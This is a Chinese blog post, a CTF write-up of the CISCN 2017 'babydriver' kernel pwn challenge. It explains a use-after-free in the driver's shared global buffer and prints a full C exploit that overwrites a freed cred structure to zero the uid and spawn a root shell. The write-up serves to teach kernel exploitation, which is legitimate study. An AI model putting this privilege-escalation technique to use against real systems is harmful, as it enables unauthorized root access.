ciscn_babydriver

最新推荐文章于 2024-06-23 12:10:55 发布
最新推荐文章于 2024-06-23 12:10:55 发布
阅读量3.4k 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: 安全 web安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123256089
版权

babydriver

kernel题目
会给这些东西
在这里插入图片描述
这里题目给的是babydriver.tar,解压一下就会出现这三个绿色的东西。
具体是什么东西直接看笔者的个人博客即可。笔者个人博客详细写了一下kernel pwn的知识和利用手法,所以这里笔者不会写得很详细。z1r0’s blog
对rootfs.cpio解包放到file_system里面。
在这里插入图片描述
看一下init。4.4.72的kernel版本。这个版本的cred结构体的大小为0xa8。
对insmod这一行的ko进行逆向
在这里插入图片描述

在这里插入图片描述

这里存在一个条件竞争
在这里插入图片描述
都使用的是一个全局的一个buf,可以理解成用户态下的uaf。
攻击思路:创建两个,第二个会覆盖第一个,然后利用kmalloc的特性,释放第一个之后再次创建一个同样大小的就会使用原来的地址,这个时候可以通过二来改一所以可以直接改cred这个结构体中的uid为0。来root shell即可。

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>


int main(int argc, char **argv){
    int fd1, fd2;
    fd1 = open("dev/babydev",O_RDWR);
    fd2 = open("dev/babydev",O_RDWR);
    ioctl(fd1, 65537, 0xa8);
    close(fd1);
    int pid = fork();
    if(pid == 0){
        char buf[28] = {0};
        write(fd2, buf, 28);
        if(getuid() == 0){
            puts("[+] root!!!!! pwned by z1r0!!!");
            system("/bin/sh");
            return 0;
        }
    }else if(pid < 0){
        puts("[-] failed");
    }else{
        wait(NULL);
    }
    close(fd2);

    return 0;

}

具体的原因看z1r0’s blog
在这里插入图片描述
运行boot.sh
在这里插入图片描述
已经变成了root shell了

z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第一道 kernel pwnCISCN2017 - babydriver
qq_41071646的博客
07-13 979
搞定 环境之后 一切就很简单了起来 (起码做题自闭 总比 环境自闭好多了) 然后 参考链接是 wiki https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_uaf-zh/ 至于 题目 wiki上都给好了 我们直接看驱动吧 这个题目确实是baby 没有任何的防护措施 而且符号表也没有 去掉 在很大程度上 把这个题简单...
【Writeup】CISCN2017_Pwn_babydriver
BAKUMANSEC - Just Do It
09-09 1844
0x01 环境配置 题目所给文件三个 boot.sh:启动脚本。多用qemu,保护措施与qemu不同的启动参数有关。 bzImage:kernel镜像。 rootfs.cpio:文件系统映像。 boot.sh内容 需要安装qemu,然后执行./boot.sh。 启动qemu虚拟机 显然本题需要进行内核提权,然后获得flag。 查看一下init文件内容 in...
CISCN 2017 babydriver uaf做法
weixin_46483787的博客
04-12 1550
本来是在学IOT和fuzz,但是比赛中经常出现kernel题,我们又没人会做,没有办法只好我来学了·····(一万个抗拒) 这可能是大部分人的第一道kernel题吧hhhhh 虽然在新的内核版本中此文的UAF做法已经失效,但是对于初学者来说,此题非常适合理解kernel题目的攻击流程 拿到题目先解压,提取文件系统: mkdir rootfs mv rootfs.cpio ./rootfs/rootfs.cpio.gz cd rootfs gunzip rootfs.cpio.gz cpio -idmv &l
【kernel-pwn】一题多解:从CISCN2017-babydriver入门题带你学习tty_struct、seq_file、msg_msg、pt_regs的利用
qq_61670993的博客
09-29 208
kernel pwn 入门
ciscn_babydriver-kernel_pwn解题一般过程
kidsama123的博客
03-18 671
ciscn_babydriver学习kernel pwn解题过程
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
CISCN_frontend
04-17
前端界面展示(待定)项目模板来源安装:nodejs环境python3环境根目录下执行npm installpip install werkzeug flask flask_cors我这里用了伪后端(为了开发方便,后期融合到django中,到时候再进行更改),伪后端...
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
[XCTF-Reverse] 7-12
weixin_52640415的博客
03-15 1262
7,easyRE1 ida打开,看到flag mov edi, offset aFlagDb2f62a36a ; "FLAG:db2f62a36a018bce28e46d976e3f9864" 换壳 flag{db2f62a36a018bce28e46d976e3f9864} 8,Reversing-x64Elf-100 主逻辑 signed __int64 __fastcall main(__int64 a1, char **a2, char **a3) { signed
[CISCN 2022 初赛]ez_usb
m0_64444909的博客
03-19 445
1.键盘流量USB协议数据部分在Leftover Capture Data域中,数据长度为八个字如图,发现击键信息为0x06,即对应的按键为C2.鼠标流量USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。
linux kernel pwn学习之伪造tty_struct执行任意函数
seaaseesa的博客
02-29 1907
Linux Kernel伪造tty_struct执行任意函数 当用户打开ptmx驱动时,会分配一个tty_struct结构,它的结构如下 structtty_struct{ intmagic; structkrefkref; structdevice*dev; structtty_driver*driver; ...
linux kernel pwn系列(一)
weixin_41918450的博客
09-26 2775
kernel pwn题目不准备以总结的方式来写,准备每一道题做一个专门的分析。网上有不少exp,准备在他人的exp的基础上进行复现(因为能力不够所以在比赛时候做不出来,只能通过事后复现)计划写 强网杯core 和 solid_core,两道改编了csaw 2010kernel pwn的题目以及ciscn babydriver。总共三道题,入门kernel pwn绰绰有余。 第一篇主要介绍linux...
第15届全国大学生知识竞赛场景实操 2022ciscn初赛 部分writeup
mumuzi的博客
05-29 1万+
Misc
linux 内核 - ioctl 函数详解
热门推荐
岁月斑驳7的博客
09-14 16万+
1. 概念 ioctl 是设备驱动程序中设备控制接口函数,一个字符设备驱动通常会实现设备打开、关闭、读、写等功能,在一些需要细分的情境下,如果需要扩展新的功能,通常以增设 ioctl() 命令的方式实现。 在文件 I/O 中,ioctl 扮演着重要角色,本文将以驱动开发为侧重点,从用户空间到内核空间纵向分析 ioctl 函数。 2. 用户空间 ioctl #include &...
[GKCTF2020]BabyDriver
weixin_47158947的博客
08-05 599
1.用ida打开, 上面什么失败成功就不说了,但是倒数第二行的好像之前做过的maze。。看看这个********** 真的是迷宫,而且只能有一种路径,要不然flag就不一样了。 __int64 __fastcall sub_140001380(__int64 a1, __int64 a2) { __int64 v2; // rbx __int64 v3; // rdi __int64 v4; // rax int v5; // ecx __int16 *v6; // rsi __in
linux内核pwn,[原创]linux kernel pwn 分析(一) 强网杯core + ciscn babydriver
weixin_42588672的博客
04-29 495
通用的提权代码是commit_creds(prepare_kernel_cred(0));这两个函数如何动态获得?借助/proc/kallsyms符号表,在运行时动态读取。这个很容易实现,贴出一例:unsigned long find_symbol_by_proc(char *file_name, char *symbol_name){FILE *s_fp;char buff[200] = {0}...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 73
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值